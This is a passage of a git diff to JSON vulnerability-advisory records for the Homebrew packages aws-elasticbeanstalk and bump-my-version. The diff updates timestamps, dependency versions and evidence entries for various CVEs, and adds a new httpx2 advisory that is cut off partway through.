"schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2024-47081", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-6345.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-6345.json index 46eaf1e5de..f7adb17a43 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-6345.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2024-6345", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-47273.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-47273.json index 0b2f223e6c..51335feb24 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-47273.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-47273", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50181.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50181.json index 38e5161662..55409ae32b 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50181.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-50181", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50182.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50182.json index f994699fa2..217e31ca3f 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50182.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-50182", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66418.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66418.json index 0889cb0a27..80a0ec60af 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66418.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-66418", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66471.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66471.json index b03ddd4506..ada1bdda1b 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66471.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-66471", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-69277.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-69277.json index be45af90d9..3c7378b05e 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-69277.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-69277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-69277", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-mrfv-m5wm-5w6w", "CVE-2025-69277", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pynacl", - "subject_version": "1.6.2", - "key": "pkg:pypi/pynacl@1.6.2", - "resource": "pynacl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-21441.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-21441.json index 2860f57436..a5c64e128b 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-21441.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-21441", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-25645.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-25645.json index 5c1b426c90..f175e94b67 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-25645.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-25645", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44405.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44405.json index 2704569f68..7d8cd43b61 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44405.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44405.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-44405", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-02T16:21:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-r374-rxx8-8654", "CVE-2026-44405", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44431.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44431.json index eefde1d63b..6c64873a83 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44431.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-44431", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44432.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44432.json index c9e10f6d1a..8e0de5bc88 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44432.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-44432", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-45409.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-45409.json index 8392f6ad90..5748a0bade 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-45409.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-45409", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-59890.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-59890.json index 94ae6302bf..c34d012067 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-59890.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-59890", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-bump-my-version-CVE-2015-8557.json b/advisories/BREW-bump-my-version-CVE-2015-8557.json index 1a2be85066..1f5d7e3aba 100644 --- a/advisories/BREW-bump-my-version-CVE-2015-8557.json +++ b/advisories/BREW-bump-my-version-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2015-8557", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2021-20270.json b/advisories/BREW-bump-my-version-CVE-2021-20270.json index d7f374a933..6cd26595ee 100644 --- a/advisories/BREW-bump-my-version-CVE-2021-20270.json +++ b/advisories/BREW-bump-my-version-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2021-20270", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2021-27291.json b/advisories/BREW-bump-my-version-CVE-2021-27291.json index 2d66ba8e28..12931974f2 100644 --- a/advisories/BREW-bump-my-version-CVE-2021-27291.json +++ b/advisories/BREW-bump-my-version-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2021-27291", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2022-40896.json b/advisories/BREW-bump-my-version-CVE-2022-40896.json index 9c9d7f659f..05a751af29 100644 --- a/advisories/BREW-bump-my-version-CVE-2022-40896.json +++ b/advisories/BREW-bump-my-version-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2022-40896", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2023-26302.json b/advisories/BREW-bump-my-version-CVE-2023-26302.json index d448ffb35f..e769d8d3d0 100644 --- a/advisories/BREW-bump-my-version-CVE-2023-26302.json +++ b/advisories/BREW-bump-my-version-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2023-26302", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-bump-my-version-CVE-2023-26303.json b/advisories/BREW-bump-my-version-CVE-2023-26303.json index 239cea329b..1e4a44daae 100644 --- a/advisories/BREW-bump-my-version-CVE-2023-26303.json +++ b/advisories/BREW-bump-my-version-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2023-26303", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-bump-my-version-CVE-2024-3651.json b/advisories/BREW-bump-my-version-CVE-2024-3651.json index 4016bd579a..029d29fb4a 100644 --- a/advisories/BREW-bump-my-version-CVE-2024-3651.json +++ b/advisories/BREW-bump-my-version-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2024-3651", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2025-43859.json b/advisories/BREW-bump-my-version-CVE-2025-43859.json index 6384a0009b..c4339f6fd2 100644 --- a/advisories/BREW-bump-my-version-CVE-2025-43859.json +++ b/advisories/BREW-bump-my-version-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2025-43859", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:57:47Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-bump-my-version-CVE-2026-28684.json b/advisories/BREW-bump-my-version-CVE-2026-28684.json index 5909ce4d2f..34e523a330 100644 --- a/advisories/BREW-bump-my-version-CVE-2026-28684.json +++ b/advisories/BREW-bump-my-version-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2026-28684", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.2.2", "resource": "python-dotenv", - "resource_purl": "pkg:pypi/python-dotenv@1.2.2" + "resource_purl": "pkg:pypi/python-dotenv@1.2.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", - "resource": "python-dotenv" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2026-4539.json b/advisories/BREW-bump-my-version-CVE-2026-4539.json index 6677aa5acb..25d4313453 100644 --- a/advisories/BREW-bump-my-version-CVE-2026-4539.json +++ b/advisories/BREW-bump-my-version-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2026-4539", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2026-45409.json b/advisories/BREW-bump-my-version-CVE-2026-45409.json index c72a2e82b6..82c2ea148e 100644 --- a/advisories/BREW-bump-my-version-CVE-2026-45409.json +++ b/advisories/BREW-bump-my-version-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2026-45409", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2026-58203.json b/advisories/BREW-bump-my-version-CVE-2026-58203.json index c10a66e797..db0de336f7 100644 --- a/advisories/BREW-bump-my-version-CVE-2026-58203.json +++ b/advisories/BREW-bump-my-version-CVE-2026-58203.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2026-58203", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-4xgf-cpjx-pc3j", "CVE-2026-58203" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.14.2", "resource": "pydantic-settings", - "resource_purl": "pkg:pypi/pydantic-settings@2.14.2" + "resource_purl": "pkg:pypi/pydantic-settings@2.15.0" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pydantic-settings", - "subject_version": "2.14.2", - "key": "pkg:pypi/pydantic-settings@2.14.2", + "subject_version": "2.15.0", + "key": "pkg:pypi/pydantic-settings@2.15.0", "resource": "pydantic-settings" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2026-7246.json b/advisories/BREW-bump-my-version-CVE-2026-7246.json index 729c1fe70a..221be1df74 100644 --- a/advisories/BREW-bump-my-version-CVE-2026-7246.json +++ b/advisories/BREW-bump-my-version-CVE-2026-7246.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2026-7246", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:57:47Z", "upstream": [ "PYSEC-2026-2132", "CVE-2026-7246", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "8.3.3", "resource": "click", - "resource_purl": "pkg:pypi/click@8.4.2" + "resource_purl": "pkg:pypi/click@8.5.0" } } ], @@ -46,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "click", - "subject_version": "8.4.2", - "key": "pkg:pypi/click@8.4.2", + "subject_version": "8.5.0", + "key": "pkg:pypi/click@8.5.0", "resource": "click" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2026-84378.json b/advisories/BREW-bump-my-version-CVE-2026-84378.json new file mode 100644 index 0000000000..cca02135aa --- /dev/null +++ b/advisories/BREW-bump-my-version-CVE-2026-84378.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bump-my-version-CVE-2026-84378", + "published": "2026-09-10T18:58:22Z", + "modified": "2026-09-10T18:58:22Z", + "upstream": [ + "GHSA-f2fp-rgf2-35cp", + "CVE-2026-84378", + "PYSEC-2026-3847" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bump-my-version", + "purl": "pkg:brew/bump-my-version" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.5.0" + }, + { + "fixed": "1.5.1_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": 